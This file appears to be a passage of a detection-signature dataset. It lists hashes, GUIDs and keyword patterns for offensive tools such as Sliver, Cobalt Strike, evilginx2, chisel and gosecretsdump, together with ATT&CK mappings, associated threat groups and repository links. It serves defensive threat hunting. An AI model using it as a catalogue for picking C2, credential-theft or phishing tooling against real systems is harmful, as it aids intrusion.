"*bd4f617afbe887d10f2e971d98b36c62e0d0bb14a8020c16e308f2a6543ae27c*",".{0,1000}bd4f617afbe887d10f2e971d98b36c62e0d0bb14a8020c16e308f2a6543ae27c.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","35530"
"*bd514bc9dda0863e30e834afcf4d5b406c228f10a980ad3f434867d5aa6ef592*",".{0,1000}bd514bc9dda0863e30e834afcf4d5b406c228f10a980ad3f434867d5aa6ef592.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35531"
"*BD5220F7-E1FB-41D2-91EC-E4C50C6E9B9F*",".{0,1000}BD5220F7\-E1FB\-41D2\-91EC\-E4C50C6E9B9F.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","#GUIDProject","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","35532"
"*bd582dca867f580de4cea00df8dafe985f7790233de90f7e962b6e6a80dd55cf*",".{0,1000}bd582dca867f580de4cea00df8dafe985f7790233de90f7e962b6e6a80dd55cf.{0,1000}","offensive_tool_keyword","shootback","a reverse TCP tunnel let you access target behind NAT or firewall","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/aploium/shootback","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","962","234","2020-09-12T07:31:56Z","2016-04-28T15:12:36Z","35533"
"*BD602C80-47ED-4294-B981-0119D2200DB8*",".{0,1000}BD602C80\-47ED\-4294\-B981\-0119D2200DB8.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","#GUIDproject","N/A","9","2","177","32","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z","35534"
"*bd61c5daaad30b420817fb1fd2f0447c3b66a1900ba69fd4cd724d1e6897ab41*",".{0,1000}bd61c5daaad30b420817fb1fd2f0447c3b66a1900ba69fd4cd724d1e6897ab41.{0,1000}","offensive_tool_keyword","ExtPassword.exe","Nirsoft tool for Windows that allows you to recover passwords stored on external drive plugged to your computer","T1081 - T1003 - T1212","TA0006 - TA0009","N/A","LockBit","Credential Access","https://www.nirsoft.net/utils/external_drive_password_recovery.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","35535"
"*BD628EE4-F3A0-4242-BCE3-95CA21114CD7*",".{0,1000}BD628EE4\-F3A0\-4242\-BCE3\-95CA21114CD7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35536"
"*bd63af36618538f67b2bf90652fb7536b40c915b307a69887df67bd5cf0400b6*",".{0,1000}bd63af36618538f67b2bf90652fb7536b40c915b307a69887df67bd5cf0400b6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35537"
"*bd6bd65ef2fa8d4d1793a31b863d2245eeb1e0ac361b84594a25236e43ff4d8c*",".{0,1000}bd6bd65ef2fa8d4d1793a31b863d2245eeb1e0ac361b84594a25236e43ff4d8c.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","35538"
"*bd70867a4f0b2aa9b06a7e08dff5bede3922580c26f366a0145d062b55a6b8ac*",".{0,1000}bd70867a4f0b2aa9b06a7e08dff5bede3922580c26f366a0145d062b55a6b8ac.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35542"
"*BD745A5E-A1E9-4FDD-A15B-E9F303A625AE*",".{0,1000}BD745A5E\-A1E9\-4FDD\-A15B\-E9F303A625AE.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","#GUIDproject","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","35543"
"*bd745a5e-a1e9-4fdd-a15b-e9f303a625ae*",".{0,1000}bd745a5e\-a1e9\-4fdd\-a15b\-e9f303a625ae.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","#GUIDproject","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","35544"
"*bd7552c78fd3f852e39b140051c4a1aa5a30a14e23eee49cfb570e19b4dbb0fa*",".{0,1000}bd7552c78fd3f852e39b140051c4a1aa5a30a14e23eee49cfb570e19b4dbb0fa.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","35545"
"*bd78ea00b16797551d4f40297f42e9b1f9d912f416a115c3eb10f340246a9d54*",".{0,1000}bd78ea00b16797551d4f40297f42e9b1f9d912f416a115c3eb10f340246a9d54.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","35546"
"*bd852d46ed2140ee627ff0798c12d589db9687c7de1b23160fe02a5570163d54*",".{0,1000}bd852d46ed2140ee627ff0798c12d589db9687c7de1b23160fe02a5570163d54.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35549"
"*bd8c697efa72709e6f0901cf7f8d570d670c8da9de6af0259ab419f2c55a17c4*",".{0,1000}bd8c697efa72709e6f0901cf7f8d570d670c8da9de6af0259ab419f2c55a17c4.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","35550"
"*bd8e4d5f1c7c01c16d145b0d203c84529fcce1bc51a7e52d8c7e2041b5ab8b0e*",".{0,1000}bd8e4d5f1c7c01c16d145b0d203c84529fcce1bc51a7e52d8c7e2041b5ab8b0e.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","35551"
"*bd976ca9268513e6cc4a58b85574f62b8a76cc92*",".{0,1000}bd976ca9268513e6cc4a58b85574f62b8a76cc92.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","35552"
"*bd99cb3ea030932e00edee60aa4a03d9fdc70d031adaa389d8c6ab12982efcaa*",".{0,1000}bd99cb3ea030932e00edee60aa4a03d9fdc70d031adaa389d8c6ab12982efcaa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35553"
"*bda266f1f529dabd975a6f974a732dd7d9de3db2e3c8c2322985c46dd3f3c01c*",".{0,1000}bda266f1f529dabd975a6f974a732dd7d9de3db2e3c8c2322985c46dd3f3c01c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35554"
"*bda4e12386c2e02081373da1ac905a6fba42ecdb2310d06aa2dc6df8b71ef544*",".{0,1000}bda4e12386c2e02081373da1ac905a6fba42ecdb2310d06aa2dc6df8b71ef544.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35555"
"*bda653b24a1896f5444b4337eaa07ee541739219ec949d30357d2cce16a99b0c*",".{0,1000}bda653b24a1896f5444b4337eaa07ee541739219ec949d30357d2cce16a99b0c.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","35556"
"*bdamele/icmpsh*",".{0,1000}bdamele\/icmpsh.{0,1000}","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","35557"
"*bdb2c6169980065f48ba91647b1f19e82453dc839278badba882e50f1bbd823e*",".{0,1000}bdb2c6169980065f48ba91647b1f19e82453dc839278badba882e50f1bbd823e.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35558"
"*bdb5649ff5beaed52016af493e446ae628e064dc663f181141bd1b7e7b360a42*",".{0,1000}bdb5649ff5beaed52016af493e446ae628e064dc663f181141bd1b7e7b360a42.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35559"
"*BDC1465EDF60B9B627B24051396694AAE3048DC5D5F7C79813C1AFA0741BBD7D*",".{0,1000}BDC1465EDF60B9B627B24051396694AAE3048DC5D5F7C79813C1AFA0741BBD7D.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","35561"
"*bdc2686a36e42dd3811d7c05c38a29d1c8107c6fa8a94b194255857bbb80053f*",".{0,1000}bdc2686a36e42dd3811d7c05c38a29d1c8107c6fa8a94b194255857bbb80053f.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","35562"
"*bdc2c691a61df0926160a728c8419244fa2a1523bf3a3c61a353afa78d80cbfe*",".{0,1000}bdc2c691a61df0926160a728c8419244fa2a1523bf3a3c61a353afa78d80cbfe.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","#filehash","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","35563"
"*bdcfb9b63fd01bdd50427f205338e26e8001015b4fe14b6016cfb08e37c08a6e*",".{0,1000}bdcfb9b63fd01bdd50427f205338e26e8001015b4fe14b6016cfb08e37c08a6e.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","35565"
"*bdcsync*",".{0,1000}bdcsync.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35566"
"*bdd26fca11a49c13b6f5a4549264172af36894eed9c2ef87ede374da202328ec*",".{0,1000}bdd26fca11a49c13b6f5a4549264172af36894eed9c2ef87ede374da202328ec.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#filehash","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","35567"
"*bdd8493bc9a1be6b5018c949bd3fc60831b83e0c97ff31933a0e9516a25947a2*",".{0,1000}bdd8493bc9a1be6b5018c949bd3fc60831b83e0c97ff31933a0e9516a25947a2.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","35568"
"*bdde4cad60ba279c32c416cee47783f8fbbc7723cc2ab5dbed096ced5d88c6a6*",".{0,1000}bdde4cad60ba279c32c416cee47783f8fbbc7723cc2ab5dbed096ced5d88c6a6.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35569"
"*bddfbb42571d9ec3398d559fb93330e60a84cfaf737a00545767a384917a01df*",".{0,1000}bddfbb42571d9ec3398d559fb93330e60a84cfaf737a00545767a384917a01df.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","35570"
"*bde38d20d4eb1a86cc38a81cc92861b3d366210af570ecb6fea93ac1060eaa7d*",".{0,1000}bde38d20d4eb1a86cc38a81cc92861b3d366210af570ecb6fea93ac1060eaa7d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35571"
"*BDED2735-F9E4-4B2E-9636-4EEDD78FC720*",".{0,1000}BDED2735\-F9E4\-4B2E\-9636\-4EEDD78FC720.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","35574"
"*bdf481e2b241169231c72a3f811c69f97526db060e11c2e7e7c1e39dadf4ac89*",".{0,1000}bdf481e2b241169231c72a3f811c69f97526db060e11c2e7e7c1e39dadf4ac89.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","35575"
"*bdf7dee28fc21a09ae10d5e3a75e3a7713e705e78a40f55a4c003c9358174372*",".{0,1000}bdf7dee28fc21a09ae10d5e3a75e3a7713e705e78a40f55a4c003c9358174372.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","35576"
"*bdf8e7a1e24bb1b99ff06801cabc7df8ab4f12684d9e349aeb6aa8c4cf891edd*",".{0,1000}bdf8e7a1e24bb1b99ff06801cabc7df8ab4f12684d9e349aeb6aa8c4cf891edd.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","35577"
"*BDFEE233-3FED-42E5-AA64-492EB2AC7047*",".{0,1000}BDFEE233\-3FED\-42E5\-AA64\-492EB2AC7047.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","0","#GUIDproject","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","35578"
"*bdllinject*",".{0,1000}bdllinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","35580"
"*bdllinject*",".{0,1000}bdllinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35581"
